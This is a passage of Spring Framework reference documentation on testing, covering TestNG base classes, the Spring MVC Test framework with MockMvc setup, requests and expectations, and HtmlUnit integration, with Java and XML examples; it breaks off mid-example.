support\nclasses for TestNG based test cases.\n\n* `AbstractTestNGSpringContextTests`\n* `AbstractTransactionalTestNGSpringContextTests`\n\n`AbstractTestNGSpringContextTests` is an abstract base test class that integrates the\n__Spring TestContext Framework__ with explicit `ApplicationContext` testing support in\na TestNG environment. When you extend `AbstractTestNGSpringContextTests`, you can\naccess a `protected` `applicationContext` instance variable that can be used to perform\nexplicit bean lookups or to test the state of the context as a whole.\n\n`AbstractTransactionalTestNGSpringContextTests` is an abstract __transactional__ extension\nof `AbstractTestNGSpringContextTests` that adds some convenience functionality for JDBC\naccess. This class expects a `javax.sql.DataSource` bean and a `PlatformTransactionManager`\nbean to be defined in the `ApplicationContext`. When you extend\n`AbstractTransactionalTestNGSpringContextTests` you can access a `protected` `jdbcTemplate`\ninstance variable that can be used to execute SQL statements to query the database. Such\nqueries can be used to confirm database state both __prior to__ and __after__ execution of\ndatabase-related application code, and Spring ensures that such queries run in the scope of\nthe same transaction as the application code. When used in conjunction with an ORM tool,\nbe sure to avoid <<testcontext-tx-false-positives,false positives>>. As mentioned in\n<<integration-testing-support-jdbc>>, `AbstractTransactionalTestNGSpringContextTests`\nalso provides convenience methods which delegate to methods in `JdbcTestUtils` using the\naforementioned `jdbcTemplate`. Furthermore, `AbstractTransactionalTestNGSpringContextTests`\nprovides an `executeSqlScript(..)` method for executing SQL scripts against the configured\n`DataSource`.\n\n\n[TIP]\n====\nThese classes are a convenience for extension. If you do not want your test classes to be\ntied to a Spring-specific class hierarchy, you can configure your own custom test classes\nby using `@ContextConfiguration`, `@TestExecutionListeners`, and so on, and by manually\ninstrumenting your test class with a `TestContextManager`. See the source code of\n`AbstractTestNGSpringContextTests` for an example of how to instrument your test class.\n====\n\n\n\n[[spring-mvc-test-framework]]\n=== Spring MVC Test Framework\n\nThe __Spring MVC Test framework__ provides first class support for testing Spring MVC\ncode using a fluent API that can be used with JUnit, TestNG, or any other testing\nframework. It's built on the\n{api-spring-framework}\/mock\/web\/package-summary.html[Servlet API mock objects]\nfrom the `spring-test` module and hence does _not_ use a running Servlet container. It\nuses the `DispatcherServlet` to provide full Spring MVC runtime behavior and provides support\nfor loading actual Spring configuration with the __TestContext framework__ in addition to a\nstandalone mode in which controllers may be instantiated manually and tested one at a time.\n\n__Spring MVC Test__ also provides client-side support for testing code that uses\nthe `RestTemplate`. Client-side tests mock the server responses and also do _not_\nuse a running server.\n\n[TIP]\n====\nSpring Boot provides an option to write full, end-to-end integration tests that include\na running server. If this is your goal please have a look at the\n{doc-spring-boot}\/html\/boot-features-testing.html#boot-features-testing-spring-boot-applications[Spring Boot reference page].\nFor more information on the differences between out-of-container and end-to-end\nintegration tests, see <<spring-mvc-test-vs-end-to-end-integration-tests>>.\n====\n\n\n\n[[spring-mvc-test-server]]\n==== Server-Side Tests\nIt's easy to write a plain unit test for a Spring MVC controller using JUnit or TestNG:\nsimply instantiate the controller, inject it with mocked or stubbed dependencies, and call\nits methods passing `MockHttpServletRequest`, `MockHttpServletResponse`, etc., as necessary.\nHowever, when writing such a unit test, much remains untested: for example, request\nmappings, data binding, type conversion, validation, and much more. Furthermore, other\ncontroller methods such as `@InitBinder`, `@ModelAttribute`, and `@ExceptionHandler` may\nalso be invoked as part of the request processing lifecycle.\n\nThe goal of __Spring MVC Test__ is to provide an effective way for testing controllers\nby performing requests and generating responses through the actual `DispatcherServlet`.\n\n__Spring MVC Test__ builds on the familiar <<mock-objects-servlet,\"mock\" implementations\nof the Servlet API>> available in the `spring-test` module. This allows performing\nrequests and generating responses without the need for running in a Servlet container.\nFor the most part everything should work as it does at runtime with a few notable\nexceptions as explained in <<spring-mvc-test-vs-end-to-end-integration-tests>>. Here is a\nJUnit Jupiter based example of using Spring MVC Test:\n\n[source,java,indent=0]\n----\nimport static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.*;\nimport static org.springframework.test.web.servlet.result.MockMvcResultMatchers.*;\n\n@SpringJUnitWebConfig(locations = \"test-servlet-context.xml\")\nclass ExampleTests {\n\n private MockMvc mockMvc;\n\n @BeforeEach\n void setup(WebApplicationContext wac) {\n this.mockMvc = MockMvcBuilders.webAppContextSetup(wac).build();\n }\n\n @Test\n void getAccount() throws Exception {\n this.mockMvc.perform(get(\"\/accounts\/1\")\n .accept(MediaType.parseMediaType(\"application\/json;charset=UTF-8\")))\n .andExpect(status().isOk())\n .andExpect(content().contentType(\"application\/json\"))\n .andExpect(jsonPath(\"$.name\").value(\"Lee\"));\n }\n\n}\n----\n\nThe above test relies on the `WebApplicationContext` support of the __TestContext framework__\nfor loading Spring configuration from an XML configuration file located in the same package\nas the test class, but Java-based and Groovy-based configuration are also supported. See these\nhttps:\/\/github.com\/spring-projects\/spring-framework\/tree\/master\/spring-test\/src\/test\/java\/org\/springframework\/test\/web\/servlet\/samples\/context[sample tests].\n\nThe `MockMvc` instance is used to perform a `GET` request to `\"\/accounts\/1\"` and verify\nthat the resulting response has status 200, the content type is `\"application\/json\"`, and the\nresponse body has a JSON property called \"name\" with the value \"Lee\". The `jsonPath`\nsyntax is supported through the Jayway https:\/\/github.com\/jayway\/JsonPath[JsonPath\nproject]. There are lots of other options for verifying the result of the performed\nrequest that will be discussed below.\n\n[[spring-mvc-test-server-static-imports]]\n===== Static Imports\nThe fluent API in the example above requires a few static imports such as\n`MockMvcRequestBuilders.{asterisk}`, `MockMvcResultMatchers.{asterisk}`, \nand `MockMvcBuilders.{asterisk}`. An easy way to find these classes is to search for\ntypes matching __\"MockMvc*\"__. If using Eclipse, be sure to add them as \n\"favorite static members\" in the Eclipse preferences under \n__Java -> Editor -> Content Assist -> Favorites__. That will allow use of content\nassist after typing the first character of the static method name. Other IDEs (e.g.\nIntelliJ) may not require any additional configuration. Just check the support for code\ncompletion on static members.\n\n[[spring-mvc-test-server-setup-options]]\n===== Setup Choices\nThere are two main options for creating an instance of `MockMvc`.\nThe first is to load Spring MVC configuration through the __TestContext\nframework__, which loads the Spring configuration and injects a `WebApplicationContext`\ninto the test to use to build a `MockMvc` instance:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextConfiguration(\"my-servlet-context.xml\")\n\tpublic class MyWebTests {\n\n\t\t@Autowired\n\t\tprivate WebApplicationContext wac;\n\n\t\tprivate MockMvc mockMvc;\n\n\t\t@Before\n\t\tpublic void setup() {\n\t\t\tthis.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nThe second is to simply create a controller instance manually without loading Spring\nconfiguration. Instead basic default configuration, roughly comparable to that of\nthe MVC JavaConfig or the MVC namespace, is automatically created and can be customized\nto a degree:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MyWebTests {\n\n\t\tprivate MockMvc mockMvc;\n\n\t\t@Before\n\t\tpublic void setup() {\n\t\t\tthis.mockMvc = MockMvcBuilders.standaloneSetup(new AccountController()).build();\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nWhich setup option should you use?\n\nThe __\"webAppContextSetup\"__ loads your actual Spring MVC configuration resulting in a\nmore complete integration test. Since the __TestContext framework__ caches the loaded\nSpring configuration, it helps keep tests running fast, even as you introduce more tests\nin your test suite. Furthermore, you can inject mock services into controllers through\nSpring configuration in order to remain focused on testing the web layer. Here is an\nexample of declaring a mock service with Mockito:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"accountService\" class=\"org.mockito.Mockito\" factory-method=\"mock\">\n\t\t<constructor-arg value=\"org.example.AccountService\"\/>\n\t<\/bean>\n----\n\nYou can then inject the mock service into the test in order set up and verify\nexpectations:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextConfiguration(\"test-servlet-context.xml\")\n\tpublic class AccountTests {\n\n\t\t@Autowired\n\t\tprivate WebApplicationContext wac;\n\n\t\tprivate MockMvc mockMvc;\n\n\t\t@Autowired\n\t\tprivate AccountService accountService;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nThe __\"standaloneSetup\"__ on the other hand is a little closer to a unit test. It tests\none controller at a time: the controller can be injected with mock dependencies manually,\nand it doesn't involve loading Spring configuration. Such tests are more focused on style\nand make it easier to see which controller is being tested, whether any specific Spring\nMVC configuration is required to work, and so on. The \"standaloneSetup\" is also a very\nconvenient way to write ad-hoc tests to verify specific behavior or to debug an issue.\n\nJust like with any \"integration vs. unit testing\" debate, there is no right or wrong\nanswer. However, using the \"standaloneSetup\" does imply the need for additional\n\"webAppContextSetup\" tests in order to verify your Spring MVC configuration.\nAlternatively, you may choose to write all tests with \"webAppContextSetup\" in order to\nalways test against your actual Spring MVC configuration.\n\n[[spring-mvc-test-server-setup-steps]]\n===== Setup Features\n\nNo matter which MockMvc builder you use all `MockMvcBuilder` implementations provide\nsome common and very useful features. For example you can declare an `Accept` header\nfor all requests and expect a status of 200 as well as a `Content-Type` header\nin all responses as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\/\/ static import of MockMvcBuilders.standaloneSetup\n\nMockMVc mockMvc = standaloneSetup(new MusicController())\n\t\t.defaultRequest(get(\"\/\").accept(MediaType.APPLICATION_JSON))\n\t\t.alwaysExpect(status().isOk())\n\t\t.alwaysExpect(content().contentType(\"application\/json;charset=UTF-8\"))\n\t\t.build();\n----\n\nIn addition 3rd party frameworks (and applications) may pre-package setup\ninstructions like the ones through a `MockMvcConfigurer`. The Spring Framework\nhas one such built-in implementation that helps to save and re-use the HTTP\nsession across requests. It can be used as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\/\/ static import of SharedHttpSessionConfigurer.sharedHttpSession\n\nMockMvc mockMvc = MockMvcBuilders.standaloneSetup(new TestController())\n .apply(sharedHttpSession())\n .build();\n\n\/\/ Use mockMvc to perform requests...\n----\n\nSee `ConfigurableMockMvcBuilder` for a list of all MockMvc builder features\nor use the IDE to explore the available options.\n\n\n\n[[spring-mvc-test-server-performing-requests]]\n===== Performing Requests\nIt's easy to perform requests using any HTTP method:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(post(\"\/hotels\/{id}\", 42).accept(MediaType.APPLICATION_JSON));\n----\n\nYou can also perform file upload requests that internally use\n`MockMultipartHttpServletRequest` so that there is no actual parsing of a multipart\nrequest but rather you have to set it up:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(multipart(\"\/doc\").file(\"a1\", \"ABC\".getBytes(\"UTF-8\")));\n----\n\nYou can specify query parameters in URI template style:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(get(\"\/hotels?foo={foo}\", \"bar\"));\n----\n\nOr you can add Servlet request parameters representing either query of form parameters:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(get(\"\/hotels\").param(\"foo\", \"bar\"));\n----\n\nIf application code relies on Servlet request parameters and doesn't check the query\nstring explicitly (as is most often the case) then it doesn't matter which option you use.\nKeep in mind however that query params provided with the URI template will be decoded while\nrequest parameters provided through the `param(...)` method are expected to already be decoded.\n\nIn most cases it's preferable to leave out the context path and the Servlet path from\nthe request URI. If you must test with the full request URI, be sure to set the\n`contextPath` and `servletPath` accordingly so that request mappings will work:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(get(\"\/app\/main\/hotels\/{id}\").contextPath(\"\/app\").servletPath(\"\/main\"))\n----\n\nLooking at the above example, it would be cumbersome to set the contextPath and\nservletPath with every performed request. Instead you can set up default request\nproperties:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MyWebTests {\n\n\t\tprivate MockMvc mockMvc;\n\n\t\t@Before\n\t\tpublic void setup() {\n\t\t\tmockMvc = standaloneSetup(new AccountController())\n\t\t\t\t.defaultRequest(get(\"\/\")\n\t\t\t\t.contextPath(\"\/app\").servletPath(\"\/main\")\n\t\t\t\t.accept(MediaType.APPLICATION_JSON).build();\n\t\t}\n----\n\nThe above properties will affect every request performed through the `MockMvc` instance.\nIf the same property is also specified on a given request, it overrides the default value.\nThat is why the HTTP method and URI in the default request don't matter since they must be\nspecified on every request.\n\n[[spring-mvc-test-server-defining-expectations]]\n===== Defining Expectations\nExpectations can be defined by appending one or more `.andExpect(..)` calls after\nperforming a request:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(get(\"\/accounts\/1\")).andExpect(status().isOk());\n----\n\n`MockMvcResultMatchers.*` provides a number of expectations, some of which are further\nnested with more detailed expectations.\n\nExpectations fall in two general categories. The first category of assertions verifies\nproperties of the response: for example, the response status, headers, and content. These\nare the most important results to assert.\n\nThe second category of assertions goes beyond the response. These assertions allow\none to inspect Spring MVC specific aspects such as which controller method processed\nthe request, whether an exception was raised and handled, what the content of the model\nis, what view was selected, what flash attributes were added, and so on. They also allow\none to inspect Servlet specific aspects such as request and session attributes.\n\nThe following test asserts that binding or validation failed:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(post(\"\/persons\"))\n\t\t.andExpect(status().isOk())\n\t\t.andExpect(model().attributeHasErrors(\"person\"));\n----\n\nMany times when writing tests, it's useful to _dump_ the results of the performed request.\nThis can be done as follows, where `print()` is a static import from\n`MockMvcResultHandlers`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(post(\"\/persons\"))\n\t\t.andDo(print())\n\t\t.andExpect(status().isOk())\n\t\t.andExpect(model().attributeHasErrors(\"person\"));\n----\n\nAs long as request processing does not cause an unhandled exception, the `print()` method\nwill print all the available result data to `System.out`. Spring Framework 4.2 introduced\na `log()` method and two additional variants of the `print()` method, one that accepts\nan `OutputStream` and one that accepts a `Writer`. For example, invoking\n`print(System.err)` will print the result data to `System.err`; while invoking\n`print(myWriter)` will print the result data to a custom writer. If you would like to\nhave the result data _logged_ instead of printed, simply invoke the `log()` method which\nwill log the result data as a single `DEBUG` message under the\n`org.springframework.test.web.servlet.result` logging category.\n\nIn some cases, you may want to get direct access to the result and verify something that\ncannot be verified otherwise. This can be achieved by appending `.andReturn()` after all\nother expectations:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tMvcResult mvcResult = mockMvc.perform(post(\"\/persons\")).andExpect(status().isOk()).andReturn();\n\t\/\/ ...\n----\n\nIf all tests repeat the same expectations you can set up common expectations once\nwhen building the `MockMvc` instance:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tstandaloneSetup(new SimpleController())\n\t\t.alwaysExpect(status().isOk())\n\t\t.alwaysExpect(content().contentType(\"application\/json;charset=UTF-8\"))\n\t\t.build()\n----\n\nNote that common expectations are __always__ applied and cannot be overridden without\ncreating a separate `MockMvc` instance.\n\nWhen JSON response content contains hypermedia links created with\nhttps:\/\/github.com\/spring-projects\/spring-hateoas[Spring HATEOAS], the resulting links can\nbe verified using JsonPath expressions:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(get(\"\/people\").accept(MediaType.APPLICATION_JSON))\n\t\t.andExpect(jsonPath(\"$.links[?(@.rel == 'self')].href\").value(\"http:\/\/localhost:8080\/people\"));\n----\n\nWhen XML response content contains hypermedia links created with\nhttps:\/\/github.com\/spring-projects\/spring-hateoas[Spring HATEOAS], the resulting links can\nbe verified using XPath expressions:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tMap<String, String> ns = Collections.singletonMap(\"ns\", \"http:\/\/www.w3.org\/2005\/Atom\");\n\tmockMvc.perform(get(\"\/handle\").accept(MediaType.APPLICATION_XML))\n\t\t.andExpect(xpath(\"\/person\/ns:link[@rel='self']\/@href\", ns).string(\"http:\/\/localhost:8080\/people\"));\n----\n\n[[spring-mvc-test-server-filters]]\n===== Filter Registrations\nWhen setting up a `MockMvc` instance, you can register one or more Servlet `Filter` instances:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc = standaloneSetup(new PersonController()).addFilters(new CharacterEncodingFilter()).build();\n----\n\nRegistered filters will be invoked through via the `MockFilterChain` from `spring-test`, and the\nlast filter will delegate to the `DispatcherServlet`.\n\n[[spring-mvc-test-vs-end-to-end-integration-tests]]\n===== Differences between Out-of-Container and End-to-End Integration Tests\n\nAs mentioned earlier __Spring MVC Test__ is built on the Servlet API mock objects from\nthe `spring-test` module and does not use a running Servlet container. Therefore\nthere are some important differences compared to full end-to-end integration tests\nwith an actual client and server running.\n\nThe easiest way to think about this is starting with a blank `MockHttpServletRequest`.\nWhatever you add to it is what the request will be. Things that may catch you by surprise\nare that there is no context path by default, no `jsessionid` cookie, no forwarding, error,\nor async dispatches, and therefore no actual JSP rendering. Instead, \"forwarded\" and\n\"redirected\" URLs are saved in the `MockHttpServletResponse` and can be asserted with\nexpectations.\n\nThis means if you are using JSPs you can verify the JSP page to which the request was\nforwarded, but there won't be any HTML rendered. In other words, the JSP will not be\n_invoked_. Note however that all other rendering technologies which don't rely on\nforwarding such as Thymeleaf and Freemarker will render HTML to the response body as\nexpected. The same is true for rendering JSON, XML, and other formats via `@ResponseBody`\nmethods.\n\nAlternatively you may consider the full end-to-end integration testing support from\nSpring Boot via `@WebIntegrationTest`. See the\n{doc-spring-boot}\/html\/boot-features-testing.html#boot-features-testing-spring-boot-applications[Spring Boot reference].\n\nThere are pros and cons for each approach. The options provided in __Spring MVC Test__\nare different stops on the scale from classic unit testing to full integration testing.\nTo be certain, none of the options in Spring MVC Test fall under the category of classic\nunit testing, but they _are_ a little closer to it. For example, you can isolate the web\nlayer by injecting mocked services into controllers, in which case you're testing the web\nlayer only through the `DispatcherServlet` but with actual Spring configuration, just\nlike you might test the data access layer in isolation from the layers above. Or you\ncan use the standalone setup focusing on one controller at a time and manually providing\nthe configuration required to make it work.\n\nAnother important distinction when using __Spring MVC Test__ is that conceptually such\ntests are on the _inside_ of the server-side so you can check what handler was used,\nif an exception was handled with a HandlerExceptionResolver, what the content of the\nmodel is, what binding errors there were, etc. That means it's easier to write\nexpectations since the server is not a black box as it is when testing it through\nan actual HTTP client. This is generally an advantage of classic unit testing, that it's\neasier to write, reason about, and debug but does not replace the need for full\nintegration tests. At the same time it's important not to lose sight of the fact that\nthe response is the most important thing to check. In short, there is room here for\nmultiple styles and strategies of testing even within the same project.\n\n\n[[spring-mvc-test-server-resources]]\n===== Further Server-Side Test Examples\nThe framework's own tests include\nhttps:\/\/github.com\/spring-projects\/spring-framework\/tree\/master\/spring-test\/src\/test\/java\/org\/springframework\/test\/web\/servlet\/samples[many\nsample tests] intended to demonstrate how to use Spring MVC Test. Browse these examples\nfor further ideas. Also the\nhttps:\/\/github.com\/spring-projects\/spring-mvc-showcase[spring-mvc-showcase] has full test\ncoverage based on Spring MVC Test.\n\n\n[[spring-mvc-test-server-htmlunit]]\n==== HtmlUnit Integration\n\nSpring provides integration between <<spring-mvc-test-server,MockMvc>> and\nhttp:\/\/htmlunit.sourceforge.net\/[HtmlUnit]. This simplifies performing end-to-end testing\nwhen using HTML based views. This integration enables developers to:\n\n* Easily test HTML pages using tools such as http:\/\/htmlunit.sourceforge.net\/[HtmlUnit],\nhttp:\/\/seleniumhq.org\/projects\/webdriver\/[WebDriver], &\nhttp:\/\/www.gebish.org\/manual\/current\/testing.html#spock_junit__testng[Geb] without the\nneed to deploy to a Servlet container\n* Test JavaScript within pages\n* Optionally test using mock services to speed up testing\n* Share logic between in-container end-to-end tests and out-of-container integration tests\n\n[NOTE]\n====\n`MockMvc` works with templating technologies that do not rely on a Servlet Container (e.g.,\nThymeleaf, FreeMarker, etc.), but it does not work with JSPs since they rely on the Servlet\ncontainer.\n====\n\n[[spring-mvc-test-server-htmlunit-why]]\n===== Why HtmlUnit Integration?\n\nThe most obvious question that comes to mind is, \"Why do I need this?\". The answer is best\nfound by exploring a very basic sample application. Assume you have a Spring MVC web\napplication that supports CRUD operations on a `Message` object. The application also supports\npaging through all messages. How would you go about testing it?\n\nWith Spring MVC Test, we can easily test if we are able to create a `Message`.\n\n[source,java]\n----\nMockHttpServletRequestBuilder createMessage = post(\"\/messages\/\")\n\t.param(\"summary\", \"Spring Rocks\")\n\t.param(\"text\", \"In case you didn't know, Spring Rocks!\");\n\nmockMvc.perform(createMessage)\n\t.andExpect(status().is3xxRedirection())\n\t.andExpect(redirectedUrl(\"\/messages\/123\"));\n----\n\nWhat if we want to test our form view that allows us to create the message? For example,\nassume our form looks like the following snippet:\n\n[source,xml]\n----\n<form id=\"messageForm\" action=\"\/messages\/\" method=\"post\">\n <div class=\"pull-right\"><a href=\"\/messages\/\">Messages<\/a><\/div>\n\n <label for=\"summary\">Summary<\/label>\n <input type=\"text\" class=\"required\" id=\"summary\" name=\"summary\" value=\"\" \/>\n\n <label for=\"text\">Message<\/label>\n <textarea id=\"text\" name=\"text\"><\/textarea>\n\n <div class=\"form-actions\">\n\t<input type=\"submit\" value=\"Create\" \/>\n <\/div>\n<\/form>\n----\n\nHow do we ensure that our form will produce the correct request to create a new message? A\nnaive attempt would look like this:\n\n[source,java]\n----\nmockMvc.perform(get(\"\/messages\/form\"))\n\t.andExpect(xpath(\"\/\/input[@name='summary']\").exists())\n\t.andExpect(xpath(\"\/\/textarea[@name='text']\").exists());\n----\n\nThis test has some obvious drawbacks. If we update our controller to use the parameter\n`message` instead of `text`, our form test would continue to pass even though the HTML\nform is out of synch with the controller. To resolve this we can combine our two tests.\n\n[[spring-mvc-test-server-htmlunit-mock-mvc-test]]\n[source,java]\n----\nString summaryParamName = \"summary\";\nString textParamName = \"text\";\nmockMvc.perform(get(\"\/messages\/form\"))\n\t\t.andExpect(xpath(\"\/\/input[@name='\" + summaryParamName + \"']\").exists())\n\t\t.andExpect(xpath(\"\/\/textarea[@name='\" + textParamName + \"']\").exists());\n\nMockHttpServletRequestBuilder createMessage = post(\"\/messages\/\")\n\t\t.param(summaryParamName, \"Spring Rocks\")\n\t\t.param(textParamName, \"In case you didn't know, Spring Rocks!\");\n\nmockMvc.perform(createMessage)\n\t\t.andExpect(status().is3xxRedirection())\n\t\t.andExpect(redirectedUrl(\"\/messages\/123\"));\n----\n\nThis would reduce the risk of our test incorrectly passing, but there are still some\nproblems.\n\n* What if we have multiple forms on our page? Admittedly we could update our xpath\n expressions, but they get more complicated the more factors we take into account (Are the\n fields the correct type? Are the fields enabled? etc.).\n* Another issue is that we are doing double the work we would expect.\n We must first verify the view, and then we submit the view with the same parameters we just\n verified. Ideally this could be done all at once.\n* Finally, there are some things that we still cannot account for. For example, what if the\n form has JavaScript validation that we wish to test as well?\n\nThe overall problem is that testing a web page does not involve a single interaction.\nInstead, it is a combination of how the user interacts with a web page and how that web\npage interacts with other resources. For example, the result of a form view is used as\nthe input to a user for creating a message. In addition, our form view may potentially\nutilize additional resources which impact the behavior of the page, such as JavaScript\nvalidation.\n\n[[spring-mvc-test-server-htmlunit-why-integration]]\n====== Integration testing to the rescue?\n\nTo resolve the issues above we could perform end-to-end integration testing, but this has\nsome obvious drawbacks. Consider testing the view that allows us to page through the messages.\nWe might need the following tests.\n\n* Does our page display a notification to the user indicating that no results are available\nwhen the messages are empty?\n* Does our page properly display a single message?\n* Does our page properly support paging?\n\nTo set up these tests, we would need to ensure our database contained the proper messages\nin it. This leads to a number of additional challenges.\n\n* Ensuring the proper messages are in the database can be tedious; consider foreign key\n constraints.\n* Testing can become slow since each test would need to ensure that the database is in the\n correct state.\n* Since our database needs to be in a specific state, we cannot run tests in parallel.\n* Performing assertions on things like auto-generated ids, timestamps, etc. can be difficult.\n\nThese challenges do not mean that we should abandon end-to-end integration testing\naltogether. Instead, we can reduce the number of end-to-end integration tests by\nrefactoring our detailed tests to use mock services which will execute much faster, more\nreliably, and without side effects. We can then implement a small number of _true_\nend-to-end integration tests that validate simple workflows to ensure that everything\nworks together properly.\n\n[[spring-mvc-test-server-htmlunit-why-mockmvc]]\n====== Enter HtmlUnit Integration\n\nSo how can we achieve a balance between testing the interactions of our pages and still\nretain good performance within our test suite? The answer is: \"By integrating MockMvc\nwith HtmlUnit.\"\n\n[[spring-mvc-test-server-htmlunit-options]]\n====== HtmlUnit Integration Options\n\nThere are a number of ways to integrate `MockMvc` with HtmlUnit.\n\n* <<spring-mvc-test-server-htmlunit-mah,MockMvc and HtmlUnit>>: Use this option if you\nwant to use the raw HtmlUnit libraries.\n* <<spring-mvc-test-server-htmlunit-webdriver,MockMvc and WebDriver>>: Use this option to\nease development and reuse code between integration and end-to-end testing.\n* <<spring-mvc-test-server-htmlunit-geb,MockMvc and Geb>>: Use this option if you would\nlike to use Groovy for testing, ease development, and reuse code between integration and\nend-to-end testing.\n\n[[spring-mvc-test-server-htmlunit-mah]]\n===== MockMvc and HtmlUnit\n\nThis section describes how to integrate `MockMvc` and HtmlUnit. Use this option if you\nwant to use the raw HtmlUnit libraries.\n\n[[spring-mvc-test-server-htmlunit-mah-setup]]\n====== MockMvc and HtmlUnit Setup\n\nFirst, make sure that you have included a test dependency on `net.sourceforge.htmlunit:htmlunit`.\nIn order to use HtmlUnit with Apache HttpComponents 4.5+, you will need to use HtmlUnit\n2.18 or higher.\n\nWe can easily create an HtmlUnit `WebClient` that integrates with `MockMvc` using the\n`MockMvcWebClientBuilder` as follows.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebClient webClient;\n\n@Before\npublic void setup() {\n\twebClient = MockMvcWebClientBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\n[NOTE]\n====\nThis is a simple example of using `MockMvcWebClientBuilder`. For advanced usage see\n<<Advanced MockMvcWebClientBuilder>>\n====\n\nThis will ensure that any URL referencing `localhost` as the server will be directed to\nour `MockMvc` instance without the need for a real HTTP connection. Any other URL will be\nrequested using a network connection as normal. This allows us to easily test the use of\nCDNs.\n\n[[spring-mvc-test-server-htmlunit-mah-usage]]\n====== MockMvc and HtmlUnit Usage\n\nNow we can use HtmlUnit as we normally would, but without the need to deploy our\napplication to a Servlet container. For example, we can request the view to create\na message with the following.\n\n[source,java]\n----\nHtmlPage createMsgFormPage = webClient.getPage(\"http:\/\/localhost\/messages\/form\");\n----\n\n[NOTE]\n====\nThe default context path is `\"\"`. Alternatively, we can specify the context path as\nillustrated in <<Advanced MockMvcWebClientBuilder>>.\n====\n\nOnce we have a reference to the `HtmlPage`, we can then fill out the form and submit\nit to create a message.\n\n[source,java]\n----\nHtmlForm form = createMsgFormPage.getHtmlElementById(\"messageForm\");\nHtmlTextInput summaryInput = createMsgFormPage.getHtmlElementById(\"summary\");\nsummaryInput.setValueAttribute(\"Spring Rocks\");\nHtmlTextArea textInput = createMsgFormPage.getHtmlElementById(\"text\");\ntextInput.setText(\"In case you didn't know, Spring Rocks!\");\nHtmlSubmitInput submit = form.getOneHtmlElementByAttribute(\"input\", \"type\", \"submit\");\nHtmlPage newMessagePage = submit.click();\n----\n\nFinally, we can verify that a new message was created successfully. The following\nassertions use the http:\/\/joel-costigliola.github.io\/assertj\/[AssertJ] library.\n\n[source,java]\n----\nassertThat(newMessagePage.getUrl().toString()).endsWith(\"\/messages\/123\");\nString id = newMessagePage.getHtmlElementById(\"id\").getTextContent();\nassertThat(id).isEqualTo(\"123\");\nString summary = newMessagePage.getHtmlElementById(\"summary\").getTextContent();\nassertThat(summary).isEqualTo(\"Spring Rocks\");\nString text = newMessagePage.getHtmlElementById(\"text\").getTextContent();\nassertThat(text).isEqualTo(\"In case you didn't know, Spring Rocks!\");\n----\n\nThis improves on our <<spring-mvc-test-server-htmlunit-mock-mvc-test,MockMvc test>> in a\nnumber of ways. First we no longer have to explicitly verify our form and then create a\nrequest that looks like the form. Instead, we request the form, fill it out, and submit\nit, thereby significantly reducing the overhead.\n\nAnother important factor is that http:\/\/htmlunit.sourceforge.net\/javascript.html[HtmlUnit\nuses the Mozilla Rhino engine] to evaluate JavaScript. This means that we can test the\nbehavior of JavaScript within our pages as well!\n\nRefer to the http:\/\/htmlunit.sourceforge.net\/gettingStarted.html[HtmlUnit documentation]\nfor additional information about using HtmlUnit.\n\n[[spring-mvc-test-server-htmlunit-mah-advanced-builder]]\n====== Advanced MockMvcWebClientBuilder\n\nIn the examples so far, we have used `MockMvcWebClientBuilder` in the simplest way possible,\nby building a `WebClient` based on the `WebApplicationContext` loaded for us by the Spring\nTestContext Framework. This approach is repeated here.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebClient webClient;\n\n@Before\npublic void setup() {\n\twebClient = MockMvcWebClientBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\nWe can also specify additional configuration options.\n\n[source,java]\n----\nWebClient webClient;\n\n@Before\npublic void setup() {\n\twebClient = MockMvcWebClientBuilder\n\t\t\/\/ demonstrates applying a MockMvcConfigurer (Spring Security)\n\t\t.webAppContextSetup(context, springSecurity())\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n}\n----\n\nAs an alternative, we can perform the exact same setup by configuring the `MockMvc`\ninstance separately and supplying it to the `MockMvcWebClientBuilder` as follows.\n\n[source,java]\n----\nMockMvc mockMvc = MockMvcBuilders\n\t\t.webAppContextSetup(context)\n\t\t.apply(springSecurity())\n\t\t.build();\n\nwebClient = 